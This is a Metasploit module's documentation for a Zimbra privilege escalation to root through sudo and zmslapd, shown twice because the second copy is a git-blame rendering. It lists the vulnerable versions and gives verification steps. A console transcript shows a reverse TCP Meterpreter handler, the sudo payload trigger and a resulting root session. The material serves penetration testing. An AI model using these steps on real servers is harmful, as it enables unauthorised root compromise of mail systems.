documentation/modules/exploit/linux/local/zimbra_slapper_priv_esc.md

## Vulnerable Application

The following versions of Zimbra are vulnerable:

* Zimbra Collaboration Suite 9.0.0 Patch 26 and earlier
* Zimbra Collaboration Suite 8.8.15 Patch 33 and earlier

## Verification Steps

Install Zimbra on any supported Linux version and get a session as the `zimbra`
user. The easiest way to exploit zimbra is to `rm $(which pax)`, reboot, and
use CVE-2022-41352. Or generate a Meterpreter payload with `msfvenom` and run
it.

From there:

```
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                  Connection
  --  ----  ----                   -----------                  ----------
  10        meterpreter x86/linux  zimbra @ zimbra.example.org  10.0.0.146:4444 -> 10.0.0.154:39800 (10.0.0.154)

msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 10
SESSION => 10
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target is vulnerable.
[*] Creating exploit directory: /tmp/.5kq9XO
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3
[*] Sending stage (3020772 bytes) to 10.0.0.154
[+] Deleted /tmp/.5kq9XO
[*] Meterpreter session 13 opened (10.0.0.146:4444 -> 10.0.0.154:40044) at 2022-07-21 14:04:12 -0700

meterpreter > getuid
Server username: root
```

## Options

### SUDO_PATH

The path to `sudo` on the host. If we have a proper environment with `$PATH` set, which we generally do, simply `sudo` is fine.

### ZIMBRA_BASE

The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`, and I'm not even sure if it _can_ install elsewhere, so this default should be fine.
Add documentation 2022-07-26 10:53:55 -07:00			`## Vulnerable Application`

Add patch notes to the Slapper module documentation 2022-10-25 10:04:52 -07:00			`The following versions of Zimbra are vulnerable:`

			`* Zimbra Collaboration Suite 9.0.0 Patch 26 and earlier`
			`* Zimbra Collaboration Suite 8.8.15 Patch 33 and earlier`
Add documentation 2022-07-26 10:53:55 -07:00
			`## Verification Steps`

Add patch notes to the Slapper module documentation 2022-10-25 10:04:52 -07:00			Install Zimbra on any supported Linux version and get a session as the `zimbra`
			user. The easiest way to exploit zimbra is to `rm $(which pax)`, reboot, and
			use CVE-2022-41352. Or generate a Meterpreter payload with `msfvenom` and run
			`it.`

			`From there:`
Add documentation 2022-07-26 10:53:55 -07:00
			```
			`msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l`

			`Active sessions`
			`===============`

			`Id Name Type Information Connection`
			`-- ---- ---- ----------- ----------`
			`10 meterpreter x86/linux zimbra @ zimbra.example.org 10.0.0.146:4444 -> 10.0.0.154:39800 (10.0.0.154)`

			`msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc`
			`[*] Using configured payload linux/x64/meterpreter/reverse_tcp`
			`msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 10`
			`SESSION => 10`
			`msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit`

			`[*] Started reverse TCP handler on 10.0.0.146:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[*] Executing: sudo -n -l`
			`[+] The target is vulnerable.`
			`[*] Creating exploit directory: /tmp/.5kq9XO`
			`[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3`
			`[*] Sending stage (3020772 bytes) to 10.0.0.154`
			`[+] Deleted /tmp/.5kq9XO`
			`[*] Meterpreter session 13 opened (10.0.0.146:4444 -> 10.0.0.154:40044) at 2022-07-21 14:04:12 -0700`

			`meterpreter > getuid`
			`Server username: root`
			```

			`## Options`

			`### SUDO_PATH`

			The path to `sudo` on the host. If we have a proper environment with `$PATH` set, which we generally do, simply `sudo` is fine.

			`### ZIMBRA_BASE`

			The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`, and I'm not even sure if it _can_ install elsewhere, so this default should be fine.